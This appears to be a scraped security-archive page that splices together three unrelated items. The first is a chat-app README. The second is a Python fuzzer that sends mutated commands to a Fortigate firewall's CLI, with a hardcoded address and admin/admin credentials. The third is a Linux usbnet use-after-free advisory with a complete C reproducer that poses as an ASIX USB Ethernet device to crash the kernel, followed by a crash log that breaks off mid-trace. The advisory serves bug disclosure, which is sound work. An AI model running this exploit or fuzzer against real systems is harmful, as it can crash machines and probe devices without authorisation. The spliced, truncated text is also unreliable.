Leaderboard

About project WebChat is a simple chatting app writed for learning purposes. It communicates between server and clients via SignalR with JWT authentication. Images below shows old version of UI. New design is dark and has login interface made with tsParticles library. Requirements & Installation To run this program you need npm, dotnet, and mssql server. Run the frontend (WebChat.Web directory) with npm server. Compile and run the backend. It should use https protocol and 5001 port. In other case, you must change hub connection settings in WebChat.Web/src/App.js. Compile solution with visual studio is recommended (instead of it you can use dotnet /build command). If you want change the DB connection string or JWT settings, look at WebChat/appsettings.Development.json file. Dont Read Me This chart perfectly shows my feelings about writing this program. 60.4% of fun 20.8% of try to not break up the keyboard 18.8% of boring ofc this values is percent of codes line. Writing 20% of the code in JS took about 70% of the time spent on project Download: WebChat-master.zip or git clone https://github.com/Reykez/WebChat.git Source

Simple python script to send commands prepared in text files mutated by an example payload string, e.g. multiple A or B letters. Using Fortigate's credentials, a user should be able to use this script to automate a basic fuzzing process for commands available in CLI. c@ubuntu:~/LABS/_SUFLET2$ cat suff.py #!/usr/bin/env python3 # suff.py -- simple universal fortigate fuzzer # # initial idea : xx.10.2022 # finished idea: xx.04.2023 # # special thanks goes to Reykez (https://github.com/Reykez) # # for more details: # https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html # from netmiko import Netmiko import sys,os import time import paramiko def readFile(filename): words = [] fileText = open(filename.strip(), 'r') for line in fileText.readlines(): for word in line.strip().split(): words.append(word.strip()) words.append('\n') return words ## def writeFile(words, filename): text = ''; for word in words: text += word; if word!='\n': text += ' ' ; f = open(filename, 'w') f.write(text) f.close() ## run modified payload: send is as cfg: fpread = open(filename, 'r') lines = fpread.read() command = lines print("DEBUG :::: type of: %s" % type(command) ) print( command ) print("DEBUG :::: eof\n") ## # set up for the target fw_01 = { 'host':'192.168.56.231', 'username':'admin', 'password':'admin', 'device_type':'fortinet' } # connecting to the target host try: net_connect = Netmiko( **fw_01 ) print("+ connected, checking prompt...") except paramiko.ssh_exception.SSHException as e: print(" > connection error: %s" % e) except ConnectionResetError as e: print("> connection error2: %s" % e) except UnboundLocalError as e: print("UnboundLocalError: local variable 'net_connect' referenced before assignment") print("> unbound variable error: %s" % e) print("... sleeping 1...") time.sleep(2) print("> sending fuzzed command...") send_init_cfg = net_connect.send_config_set( command ) # init_cfg... print("+ looks like we just sent this command:\n\t%s\n\n" % send_init_cfg ) ## finished fuzzed super-payload attack ## #### def modifyFilename(filename, number): name, extension = os.path.splitext(filename) return "{name}{uid}{extension}".format(name=name, uid=str(number).zfill(2), extension=extension) #### parse and validate command line args, proceed program args = sys.argv[1:] filename = args[0] if 0 in range(len(args)) else input ('Filename?') textToReplace = args[1] if 1 in range(len(args)) else input ('text to replace? ') outputBasename = args[2] if 2 in range(len(args)) else input ('output basename') words = readFile(filename); # reaplce any occurency and print fileIndex = 0 for wordIndex in range(len(words)): if words[wordIndex] == '\n': continue fileIndex += 1 wordsCopy = words.copy() try: wordsCopy[wordIndex] = textToReplace writeFile(wordsCopy, modifyFilename(outputBasename, fileIndex ) ) except UnboundLocalError as e: print("UnboundLocalError: local variable 'net_connect' referenced before assignment") print("> unbound variable error: %s" % e) pass print('Successfully generated', modifyFilename(outputBasename, 1), '-', modifyFilename(outputBasename, fileIndex), ' files!') Source

Linux USB usbnet tells minidrivers to unbind while netdev is still up, causing use-after-free conditions. Download: GS20230313141819.tgz (10.7 KB) Mirror: usb-ax88172a.c // roughly based off https://github.com/xairy/raw-gadget/blob/master/examples/keyboard.c // NOTE: this is playing fast-and-loose with endianness, it'll break on big-endian systems. #include <err.h> #include <signal.h> #include <stdbool.h> #include <assert.h> #include <alloca.h> #include <errno.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/usb/cdc.h> #include <linux/usb/raw_gadget.h> #include <linux/mii.h> #include <linux/mdio.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static int usb_fd; #define errx(code, ...) { printf(__VA_ARGS__); printf("\n"); while (1) pause(); } struct usb_raw_control_event { struct usb_raw_event inner; struct usb_ctrlrequest ctrl; }; static struct usb_device_descriptor usb_device = { .bLength = USB_DT_DEVICE_SIZE, .bDescriptorType = USB_DT_DEVICE, .bcdUSB = __constant_cpu_to_le16(0x0200), /* USB 2.0 */ .bDeviceClass = __constant_cpu_to_le16(USB_CLASS_COMM), // is this even used? .bMaxPacketSize0 = 64, /* maximum value the kernel lets us use */ /* "We are a very legit..." (checks notes) "ASIX 88172a demo board" (looks * back up) "and would like to help you get connected to the network!" */ .idVendor = __constant_cpu_to_le16(0x0b95), .idProduct = __constant_cpu_to_le16(0x172a), .iManufacturer = 1, .iProduct = 2, .iSerialNumber = 3, .bNumConfigurations = 1 }; struct usb_config_descriptor usb_config = { .bLength = USB_DT_CONFIG_SIZE, .bDescriptorType = USB_DT_CONFIG, .wTotalLength = 0, // fixed up later .bNumInterfaces = 1, .bConfigurationValue = 1, .iConfiguration = 4, .bmAttributes = USB_CONFIG_ATT_ONE |// must be set USB_CONFIG_ATT_SELFPOWER, .bMaxPower = 0 // no power draw from host }; struct usb_interface_descriptor usb_interface = { .bLength = USB_DT_INTERFACE_SIZE, .bDescriptorType = USB_DT_INTERFACE, .bInterfaceNumber = 0, .bAlternateSetting = 0, .bNumEndpoints = 3, .bInterfaceClass = USB_CLASS_COMM, // ? .bInterfaceSubClass = USB_CDC_SUBCLASS_ETHERNET, .bInterfaceProtocol = USB_CDC_PROTO_NONE, .iInterface = 5, }; struct usb_endpoint_descriptor usb_endpoint_in = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN | 1, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = 512, //.bInterval = 1 }; struct usb_endpoint_descriptor usb_endpoint_out = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_OUT | 1, .bmAttributes = USB_ENDPOINT_XFER_BULK, .wMaxPacketSize = 512, //.bInterval = 1 }; struct usb_endpoint_descriptor usb_endpoint_intr = { .bLength = USB_DT_ENDPOINT_SIZE, .bDescriptorType = USB_DT_ENDPOINT, .bEndpointAddress = USB_DIR_IN | 2, .bmAttributes = USB_ENDPOINT_XFER_INT, .wMaxPacketSize = 8, .bInterval = 1 }; unsigned short intr_handle; void usb_reply(void *data, size_t len, size_t req_length) { printf(" REPLY: size %lu, req_length %lu\n", (unsigned long)len, (unsigned long)req_length); if (len > req_length) len = req_length; struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+len); io->ep = 0; io->flags = 0; io->length = len; memcpy(io->data, data, len); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_WRITE, io)); } void usb_reply_zero(size_t req_length) { char *data = alloca(req_length); memset(data, '\0', req_length); usb_reply(data, req_length, req_length); } void usb_get_and_ack(void *buf, size_t len, size_t req_length) { printf(" ACK OUT: req_length %lu\n", (unsigned long)req_length); struct usb_raw_ep_io *io = alloca(sizeof(struct usb_raw_ep_io)+req_length); memset(io, 0xee, sizeof(struct usb_raw_ep_io)+req_length); io->ep = 0; io->flags = 0; io->length = req_length; //printf("issuing USB_RAW_IOCTL_EP0_READ with io->length=%u\n", io->length); int ret_len = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP0_READ, io)); assert(ret_len == req_length); if (buf) { if (len > req_length) { memset(buf, '\0', len); len = req_length; } memcpy(buf, ((char*)io)+sizeof(struct usb_raw_ep_io), len); } } void usb_ack(size_t req_length) { usb_get_and_ack(NULL, 0, req_length); } void descr_append(void *buf, size_t *buf_len, void *descr, size_t descr_len) { printf(" descr_append(buf, len, descr, descr_len=%lu with first byte %hhu\n", (unsigned long)descr_len, *(unsigned char *)descr); assert(descr_len <= 255); assert(descr_len >= 2); assert(((unsigned char*)descr)[0] == descr_len); memcpy(buf + *buf_len, descr, descr_len); (*buf_len) += descr_len; ((struct usb_config_descriptor*)buf)->wTotalLength = __cpu_to_le16(*buf_len); } int state = 0; void handle_alarm(int sig) { if (state == 0) state = 1; } int main(int argc, char **argv) { setbuf(stdout, NULL); setbuf(stderr, NULL); usb_fd = SYSCHK(open("/dev/raw-gadget", O_RDWR)); struct usb_raw_init init_args = { .speed = USB_SPEED_HIGH }; strcpy(init_args.driver_name, argv[1]); strcpy(init_args.device_name, argv[2]); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_INIT, &init_args)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_RUN, 0)); struct sigaction alarm_act = { .sa_handler = handle_alarm, .sa_flags = 0 }; if (sigaction(SIGALRM, &alarm_act, NULL)) err(1, "sigaction"); //alarm(30); while (1) { if (state == 1) { printf("===================== BRINGING LINK UP =====================\n"); state = 2; struct { struct usb_raw_ep_io io; struct { /*ax88172_int_data*/ unsigned short res1; unsigned char link; unsigned short res2; unsigned char status; unsigned short res3; unsigned int intdata2; } __attribute__((packed)) data; } io_with_data = { .io = { .ep = intr_handle, .flags = 0, .length = sizeof(io_with_data.data) }, .data = { .link = 1 } }; SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_WRITE, &io_with_data)); /* close(usb_fd); exit(0); */ } struct usb_raw_control_event control_ev = { .inner = { .type = 0, .length = sizeof(control_ev.ctrl) } }; int res = ioctl(usb_fd, USB_RAW_IOCTL_EVENT_FETCH, &control_ev); if (res == -1) { if (errno == EINTR) continue; err(1, "USB_RAW_IOCTL_EVENT_FETCH"); } if (control_ev.inner.type == USB_RAW_EVENT_CONNECT) { // nothing to do } else if (control_ev.inner.type == USB_RAW_EVENT_CONTROL) { unsigned req_length = __le16_to_cpu(control_ev.ctrl.wLength); bool is_dir_in = (control_ev.ctrl.bRequestType & USB_DIR_IN) != 0; printf("got control (in=%d, wLength=%u):\n", is_dir_in, req_length); switch (control_ev.ctrl.bRequestType & USB_TYPE_MASK) { case USB_TYPE_STANDARD: switch(control_ev.ctrl.bRequest) { case USB_REQ_GET_DESCRIPTOR: { unsigned descriptor_type = control_ev.ctrl.wValue >> 8; switch (descriptor_type) { case USB_DT_DEVICE: printf(" getting device descriptor\n"); usb_reply(&usb_device, sizeof(usb_device), req_length); break; case USB_DT_CONFIG: { printf(" getting dt config\n"); char dt_config[1024*128]; size_t dt_config_len = 0; descr_append(dt_config, &dt_config_len, &usb_config, sizeof(usb_config)); descr_append(dt_config, &dt_config_len, &usb_interface, sizeof(usb_interface)); descr_append(dt_config, &dt_config_len, &usb_endpoint_in, USB_DT_ENDPOINT_SIZE); descr_append(dt_config, &dt_config_len, &usb_endpoint_out, USB_DT_ENDPOINT_SIZE); descr_append(dt_config, &dt_config_len, &usb_endpoint_intr, USB_DT_ENDPOINT_SIZE); usb_reply(dt_config, dt_config_len, req_length); } break; case USB_DT_STRING: { unsigned string_id = control_ev.ctrl.wValue & 0xff; printf(" getting string %d\n", string_id); if (string_id == 0) { unsigned char string_descr[] = { 4/*length*/, USB_DT_STRING, 0x09, 0x04 /* English - United States */ }; usb_reply(string_descr, sizeof(string_descr), req_length); } else { unsigned char string_descr[] = { 12/*length*/, USB_DT_STRING, 'D',0,'U',0,'M',0,'M',0,'Y',0 }; usb_reply(string_descr, sizeof(string_descr), req_length); } } break; default: errx(1, "USB_REQ_GET_DESCRIPTOR: descriptor_type=%x", descriptor_type); } } break; case USB_REQ_SET_CONFIGURATION: { printf(" set configuration\n"); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_in)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_out)); intr_handle = SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_EP_ENABLE, &usb_endpoint_intr)); SYSCHK(ioctl(usb_fd, USB_RAW_IOCTL_CONFIGURE, 0)); usb_ack(req_length); } break; case USB_REQ_SET_INTERFACE: { printf(" set interface\n"); usb_ack(req_length); } break; default: errx(1, "unknown standard ctrlrequest 0x%x", (unsigned)control_ev.ctrl.bRequest); } break; case USB_TYPE_CLASS: errx(1, "unknown class ctrlrequest"); case USB_TYPE_VENDOR: printf(" vendor ctrlrequest bRequest=0x%02hhx wValue=0x%04hx wIndex=0x%04hx wLength=0x%04hx\n", control_ev.ctrl.bRequest, control_ev.ctrl.wValue, control_ev.ctrl.wIndex, control_ev.ctrl.wLength); if (!is_dir_in) { usb_ack(req_length); continue; } switch (control_ev.ctrl.bRequest) { #if 1 case 0x01/*AX_ACCESS_MAC*/: { static unsigned char srom_addr; static const unsigned short ledvalue = (1<<15/*LED_VALID*/); printf(" AX_ACCESS_MAC\n"); switch (control_ev.ctrl.wValue) { case 0x02/*PHYSICAL_LINK_STATUS*/: { printf(" PHYSICAL_LINK_STATUS\n"); /* Linux checks AX_USB_SS and AX_USB_HS, influences URB size: * ->rx_urb_size * can be 0x5000 / 0x6000 / 0x6800 / 0x6800 * We prefer the smallest one (0x5000), which we get from * setting AX_USB_SS plus GMII_PHY_PHYSR_GIGA. */ unsigned char pl_status = 0x04; /*AX_USB_SS*/ usb_reply(&pl_status, sizeof(pl_status), req_length); } break; case 0x03/*GENERAL_STATUS*/: { printf(" GENERAL_STATUS\n"); unsigned short general_status = __cpu_to_le16(0x04/*AX_SECLD*/); usb_reply(&general_status, 2, req_length); } break; case 0x07/*AX_SROM_ADDR*/: { printf(" AX_SROM_ADDR\n"); usb_get_and_ack(&srom_addr, 1, req_length); printf(" SROM address: 0x%hhx\n", srom_addr); } break; case 0x08/*AX_SROM_DATA_LOW*/: { printf(" AX_SROM_DATA_LOW from 0x%hhx\n", srom_addr); if (srom_addr < 6) { unsigned char eeprom_head[12] = { /*0-5*/0, 0, 0, 0, 0, 0, // dontcare (first must not be FF) /*6-9*/0, 0, 0, 0, // checksummed /*10*/0xff // checksum }; usb_reply(eeprom_head + srom_addr*2, 2, req_length); } else if (srom_addr == 0x42) { unsigned char b = 8 & 0xff; usb_reply(&b, 1, req_length); } else { errx(1, "unhandled SROM range"); } } break; case 0x09/*AX_SROM_DATA_HIGH*/: { printf(" AX_SROM_DATA_HIGH from 0x%hhx\n", srom_addr); if (srom_addr == 0x42) { unsigned char b = ledvalue >> 8; usb_reply(&b, 1, req_length); } else { errx(1, "unhandled SROM range"); } } break; case 0x0a/*AX_SROM_CMD*/: { printf(" AX_SROM_CMD\n"); if (is_dir_in) { unsigned char value = 0; // EEP_BUSY would spin until timeout usb_reply(&value, 1, req_length); } else { usb_ack(req_length); } } break; case 0x0b/*AX_RX_CTL*/: { unsigned short ax_rx_ctl_value; usb_get_and_ack(&ax_rx_ctl_value, sizeof(ax_rx_ctl_value), req_length); printf(" AX_RX_CTL = 0x%04hx ################\n", ax_rx_ctl_value); } break; case 0x16/*AX_MULFLTARY*/: { printf(" AX_MULFLTARY ||||||||||||||||||||||||||||||||||||||||||\n"); usb_ack(req_length); if (state == 0) state = 1; } break; case 0x22/*AX_MEDIUM_STATUS_MODE*/: { printf(" AX_MEDIUM_STATUS_MODE\n"); usb_ack(req_length); } break; case 0x24/*AX_MONITOR_MOD*/: { printf(" AX_MONITOR_MOD\n"); usb_ack(req_length); } break; case 0x26/*AX_PHYPWR_RSTCTL*/: { printf(" AX_PHYPWR_RSTCTL\n"); usb_ack(req_length); } break; case 0x2e/*AX_RX_BULKIN_QCTRL*/: { printf(" AX_RX_BULKIN_QCTRL\n"); usb_ack(req_length); } break; case 0x34/*AX_RXCOE_CTL*/: { printf(" AX_RXCOE_CTL\n"); usb_ack(req_length); } break; case 0x35/*AX_TXCOE_CTL*/: { printf(" AX_TXCOE_CTL\n"); usb_ack(req_length); } break; case 0x54/*AX_PAUSE_WATERLVL_HIGH*/: { printf(" AX_PAUSE_WATERLVL_HIGH\n"); usb_ack(req_length); } break; case 0x55/*AX_PAUSE_WATERLVL_LOW*/: { printf(" AX_PAUSE_WATERLVL_LOW\n"); usb_ack(req_length); } break; case 0x73/*AX_LEDCTRL*/: { printf(" AX_LEDCTRL\n"); usb_ack(req_length); } break; case 0x33/*AX_CLOCK_SELECT*/: { printf(" AX_CLOCK_SELECT\n"); usb_ack(req_length); } break; case 0x10/*AX_NODE_ID*/: { printf(" AX_NODE_ID\n"); if (is_dir_in) { unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 }; usb_reply(mac_addr, sizeof(mac_addr), req_length); } else { usb_ack(req_length); } } break; default: if (is_dir_in) { errx(1, " unknown AX_ACCESS_MAC command 0x%02hhx", control_ev.ctrl.wValue); } else { printf(" ignoring unknown OUT AX_ACCESS_MAC command 0x%02hx\n", control_ev.ctrl.wValue); } } } break; case 0x02/*AX_ACCESS_PHY*/: { printf(" AX_ACCESS_PHY\n"); assert(control_ev.ctrl.wValue == 0x03/*AX88179_PHY_ID*/); static unsigned short mmd_id; static bool no_auto_increment; switch (control_ev.ctrl.wIndex) { case MII_BMCR: { /* Basic mode control register */ /* idk what any of these flags actually do in detail... */ printf(" MII_BMCR (basic mode control register)\n"); if (is_dir_in) { unsigned short bmcr_state = BMCR_SPEED1000 | BMCR_FULLDPLX; usb_reply(&bmcr_state, sizeof(bmcr_state), req_length); } else { usb_ack(req_length); } } break; case MII_MMD_CTRL: { printf(" MII_MMD_CTRL\n"); usb_get_and_ack(&mmd_id, 2, req_length); mmd_id &= ~0x4000; no_auto_increment = (mmd_id & 0x4000) != 0; printf(" set ID %d, no-auto-increment %d\n", mmd_id, no_auto_increment); } break; case MII_MMD_DATA: { printf(" MII_MMD_DATA (at ID %d)\n", mmd_id); if (is_dir_in) { switch (mmd_id) { case MDIO_MMD_PCS: printf(" Physical Coding Sublayer\n"); // decoded via mmd_eee_cap_to_ethtool_sup_t() unsigned short eee_caps = MDIO_EEE_1000T; usb_reply(&eee_caps, sizeof(eee_caps), req_length); break; case MDIO_MMD_AN: printf(" Auto-Negotiation\n"); // WARNING: this is actually used in two different // contexts unsigned short eee_adv = MDIO_EEE_1000T; usb_reply(&eee_adv, sizeof(eee_adv), req_length); break; default: errx(1, "unknown ID %d", mmd_id); } } else { usb_ack(req_length); } } break; case MII_PHYADDR: { printf(" MII_PHYADDR\n"); usb_ack(req_length); } break; case 0x11/*GMII_PHY_PHYSR*/: { printf(" MII_PHY_PHYSR\n"); unsigned short physr = 0x0400/*GMII_PHY_PHYSR_LINK*/ | 0x8000/*GMII_PHY_PHYSR_GIGA*/; usb_reply(&physr, sizeof(physr), req_length); } break; case 0x1a/*GMII_LED_ACT*/: { printf(" GMII_LED_ACT\n"); if (is_dir_in) { unsigned short ledact = 0; usb_reply(&ledact, sizeof(ledact), req_length); } else { usb_ack(req_length); } } break; case 0x1c/*GMII_LED_LINK*/: { printf(" GMII_LED_LINK\n"); if (is_dir_in) { unsigned short ledlink = 0; usb_reply(&ledlink, sizeof(ledlink), req_length); } else { usb_ack(req_length); } } break; case 0x1e/*GMII_PHYPAGE*/: { printf(" GMII_PHYPAGE\n"); usb_ack(req_length); } break; case 0x1f/*GMII_PHY_PAGE_SELECT*/: { printf(" GMII_PHY_PAGE_SELECT\n"); usb_ack(req_length); } break; default: errx(1, " unknown AX_ACCESS_PHY command 0x%02hhx", control_ev.ctrl.wIndex); } } break; case 0x04/*AX_ACCESS_PHY*/: { unsigned eeprom_idx = (unsigned)control_ev.ctrl.wValue; printf(" AX_ACCESS_EEPROM at 0x%x\n", eeprom_idx); if (is_dir_in) { printf(" EEPROM read\n"); switch (eeprom_idx) { case 0x43: {/* autodetach */ unsigned short autodetach = 0xffff; usb_reply(&autodetach, sizeof(autodetach), req_length); } break; default: errx(1, "unhandled EEPROM offset"); } } else { printf(" ignoring EEPROM write\n"); usb_ack(req_length); } } break; case 0x81: { printf(" 0x81 TX FIFO check\n"); unsigned int tx_fifo_state = 0; usb_reply(&tx_fifo_state, sizeof(tx_fifo_state), req_length); } break; #endif case 0x13/*AX_CMD_READ_NODE_ID*/: { unsigned char mac_addr[] = { 0x00, 0x12, 0x34, 0x56, 0x78, 0x90 }; usb_reply(mac_addr, sizeof(mac_addr), req_length); } break; case 0x21/*AX_CMD_SW_PHY_STATUS*/: case 0x1a/*AX_CMD_READ_MEDIUM_STATUS*/: case 0x0f/*AX_CMD_READ_RX_CTL*/: { usb_reply_zero(req_length); } break; case 0x19/*AX_CMD_READ_PHY_ID*/: { printf(" CMD_READ_PHY_ID\n"); unsigned short phy_id = 1; usb_reply(&phy_id, sizeof(phy_id), req_length); } break; case 0x09/*AX_CMD_STATMNGSTS_REG*/: { printf(" CMD_STATMNGSTS_REG\n"); unsigned char val = 0x01; /* AX_HOST_EN */ usb_reply(&val, sizeof(val), req_length); } break; case 0x07/*AX_CMD_READ_MII_REG*/: { printf(" CMD_READ_MII_REG\n"); /* unsigned char val = 0x01; usb_reply(&val, sizeof(val), req_length); */ switch (control_ev.ctrl.wIndex) { case MII_BMCR: { /* Basic mode control register */ /* idk what any of these flags actually do in detail... */ printf(" MII_BMCR (basic mode control register)\n"); unsigned short bmcr_state = BMCR_SPEED100 | BMCR_FULLDPLX; usb_reply(&bmcr_state, sizeof(bmcr_state), req_length); } break; case MII_BMSR: { /* Basic mode status register */ printf(" MII_BMSR (basic mode status register)\n"); /* say link is initially down */ unsigned short bmsr_state = ((state > 0) ? BMSR_LSTATUS : 0) | BMSR_100FULL; usb_reply(&bmsr_state, sizeof(bmsr_state), req_length); } break; case MII_ADVERTISE: { /* Advertisement control register */ printf(" MII_ADVERTISE\n"); unsigned short adv_state = ADVERTISE_100FULL; usb_reply(&adv_state, sizeof(adv_state), req_length); } break; case MII_LPA: { /* Link partner ability */ printf(" MII_LPA (Link partner ability)\n"); unsigned short lpa_state = LPA_100FULL; usb_reply(&lpa_state, sizeof(lpa_state), req_length); } break; case MII_PHYSID1: case MII_PHYSID2: { printf(" MII_PHYSID\n"); unsigned short physid = 1; usb_reply(&physid, sizeof(physid), req_length); } break; default: errx(1, " unknown READ_MII_REG command 0x%02hhx", control_ev.ctrl.wIndex); } } break; #if 0 case 0x10/*AX_CMD_WRITE_RX_CTL*/: { printf(" CMD_WRITE_RX_CTL = 0x%hx\n", control_ev.ctrl.wIndex); usb_ack(req_length); } break; case 0x16/*AX_CMD_WRITE_MULTI_FILTER*/: { printf(" CMD_WRITE_MULTI_FILTER\n"); usb_ack(req_length); } break; #endif default: if (is_dir_in) { errx(1, "unknown vendor ctrlrequest 0x%02hhx", control_ev.ctrl.bRequest); } else { printf(" ignoring unknown vendor ctrlrequest 0x%02hx\n", control_ev.ctrl.bRequest); usb_ack(req_length); } } break; default: errx(1, "USB_TYPE_* unknown"); } } else { printf("unknown event, type 0x%x\n", (unsigned)control_ev.inner.type); } } } advisory-info.txt Linux USB: usbnet tells minidrivers to unbind while netdev is still up, causing UAFs I've been digging more into the usbnet code, and it's all really brittle. I keep hitting random KASAN splats while I'm just trying to normally bring up drivers (mainly when my fake USB device can't handle some request yet and exits, which results in a USB disconnect, and apparently usbnet tends to blow up a lot in various ways if you disconnect before the device is fully up, at least on a kernel with CONFIG_RCU_STRICT_GRACE_PERIOD=y). One particularly easy-to-trigger bug was introduced by commit 2c9d6c2b871d (\"usbnet: run unbind() before unregister_netdev()\"), first in v5.14. Before that commit, the driver_info->unbind() callback was the last call to the minidriver during USB disconnect, and so one of the things some minidrivers do there is to free memory associated with the device. But after that commit, the semantics of driver_info->unbind() are completely different: It is called at a point where the networking subsystem **has no idea** yet that the device is going down. The netdev might still be up, or in the middle of going up, or going down, or whatever else netdevs do; and so it is still possible that e.g. userspace sends some netlink message that results in a call to the minidriver's ->reset method, and then e.g. aqc111_reset() will try to access its freed dev->driver_priv, and you get UAF. I looked at this more, and it turns out that with another minidriver, you don't even need to race to cause a UAF: Simply disconnecting a USB device when it is currently up will reliably cause a UAF. This is the case with the driver in drivers/net/usb/ax88172a.c (described as \"ASIX AX88172A USB 2.0 Ethernet\"), which is only used for the USB device ID of some demo board, nothing else: /* ASIX 88172a demo board */ USB_DEVICE(0x0b95, 0x172a), .driver_info = (unsigned long) &ax88172a_info, (Even though this driver is only used for talking to some demo board, it is enabled in kconfig together with all the other ASIX devices using kconfig flag CONFIG_USB_NET_AX8817X, which is enabled on many kernels, including Debian, some Android kernels and Chrome OS. Android and Chrome OS are probably not affected by this one though, since they run sufficiently old kernels...) The call graph of how the UAF happens: usbnet_disconnect ax88172a_unbind (as driver_info->unbind) kfree(dev->driver_priv) unregister_netdev unregister_netdevice unregister_netdevice_queue unregister_netdevice_many dev_close_many __dev_close_many usbnet_stop (as ops->ndo_stop) ax88172a_stop (as driver_info->stop) [UAF access to dev->driver_priv] The driver_info->stop() handler tries to access data that was freed in driver_info->unbind(). This makes it pretty clear that the reordering in commit 2c9d6c2b871d broke stuff. I have no clue how to fix all this though. From what I can tell, there are two points during usbnet_disconnect() where the minidriver might want to get a callback: - When ->ndo_close() is invoked by the netdev code; at that point, the netdev is definitely down but hasn't been completely torn down yet. usbnet doesn't currently use ->ndo_open/->ndo_close at all. - In the spot where the driver_info->unbind callback used to happen before commit 2c9d6c2b871d. But I have no clue whether we need one or both of these, and which of the things the current ->unbind callbacks do have to happen at what time. commit 2c9d6c2b871d claims that the current ->unbind callback is too late for the minidriver to disconnect PHY, so I guess that should probably happen in ->ndo_close()? Maybe? This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-19. ==== kernel splats and reproduction instructions ==== On a system running a normal Debian experimental kernel (version 5.17.0-rc3-amd64 #1 Debian 5.17~rc3-1~exp1), this also happens. With slub_debug=PF (to make SLUB poison freed memory and do some extra consistency checks to make UAFs easier to see), I get this in dmesg when I attach a fake USB device (over real USB, using a NET2380 USB device-side controller on another machine), wait for a few seconds so that it can be brought up completely, and then disconnect it: [ 138.697877] usb 1-2: new high-speed USB device number 3 using xhci_hcd [ 138.852315] usb 1-2: New USB device found, idVendor=0b95, idProduct=172a, bcdDevice= 0.00 [ 138.856972] usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 138.861557] usb 1-2: Product: DUMMY [ 138.866016] usb 1-2: Manufacturer: DUMMY [ 138.870312] usb 1-2: SerialNumber: DUMMY [ 139.403344] asix 1-2:1.0 (unnamed net_device) (uninitialized): registered mdio bus usb-001:003 [ 139.404897] asix 1-2:1.0 eth1: register 'asix' at usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet, 00:12:34:56:78:90 [ 139.406292] usbcore: registered new interface driver asix [ 139.408747] usbcore: registered new interface driver cdc_ether [ 139.481399] asix 1-2:1.0 enx001234567890: renamed from eth1 [ 140.150427] asix 1-2:1.0 enx001234567890: Connected to phy usb-001:003:00 [ 149.299153] usb 1-2: USB disconnect, device number 3 [ 149.303077] asix 1-2:1.0 enx001234567890: unregister 'asix' usb-0000:00:14.0-2, ASIX AX88172A USB 2.0 Ethernet [ 149.306775] asix 1-2:1.0 enx001234567890: deregistering mdio bus usb-001:003 [ 149.314206] asix 1-2:1.0 enx001234567890: Disconnecting from phy kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk\\xa5%!LhH\\xf2/\\xa1ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ\\x80\\xe5W\\xe1\\xf9\\x99\\xff\\xff\\xe0#\u0561\\xff\\xff\\xff\\xff\\x80t\\xf0\\xc0\\xff\\xff\\xff\\xff\\x98XW\\x82\\xf9\\x99\\xff\\xff\\x80\\xb9[\\xe1\\xf9\\x99\\xff\\xff [ 149.315731] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6f43: 0000 [#1] PREEMPT SMP PTI [ 149.317234] CPU: 4 PID: 105 Comm: kworker/4:1 Tainted: G E 5.17.0-rc3-amd64 #1 Debian 5.17~rc3-1~exp1 [ 149.318815] Hardware name: [...] [ 149.320214] Workqueue: usb_hub_wq hub_event [usbcore] [ 149.321030] RIP: 0010:phy_stop+0x9/0xf0 [libphy] [ 149.321835] Code: 02 e0 eb d4 48 8b 0c dd 20 ed b9 c0 e9 33 ff ff ff 4c 89 f7 e8 68 a3 fa df eb c6 e8 11 ff 1a e0 90 0f 1f 44 00 00 41 54 55 53 <8b> 87 d8 03 00 00 4c 8b a7 28 05 00 00 8d 50 ff 83 fa 01 0f 86 af [ 149.322714] RSP: 0018:ffffb68a807efa58 EFLAGS: 00010246 [ 149.323560] RAX: 0000000000000000 RBX: ffff99f9e168e980 RCX: 0000000000000000 [ 149.324405] RDX: ffffb68a807efa08 RSI: ffffffffa15526f6 RDI: 6b6b6b6b6b6b6b6b [ 149.325251] RBP: ffff99f9e15bbb80 R08: 0000000000000000 R09: ffffb68a807ef758 [ 149.326128] R10: ffffb68a807ef750 R11: ffffffffa1cd1568 R12: 0000000000000000 [ 149.326965] R13: ffff99f9e168e980 R14: ffffb68a807efad0 R15: ffffb68a807efba0 [ 149.327800] FS: 0000000000000000(0000) GS:ffff99fc8f700000(0000) knlGS:0000000000000000 [ 149.328641] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 149.329482] CR2: 00007fc2351ba6f4 CR3: 00000002fb410001 CR4: 00000000001706e0 [ 149.330352] Call Trace: [ 149.331198] <TASK> [ 149.332030] ax88172a_stop.cold+0x20/0x2e [asix] [ 149.332857] usbnet_stop+0x64/0x140 [usbnet] [ 149.333676] __dev_close_many+0x9e/0x110 [ 149.334512] dev_close_many+0x8b/0x140 [ 149.335295] ? __slab_free+0xa0/0x330 [ 149.336059] 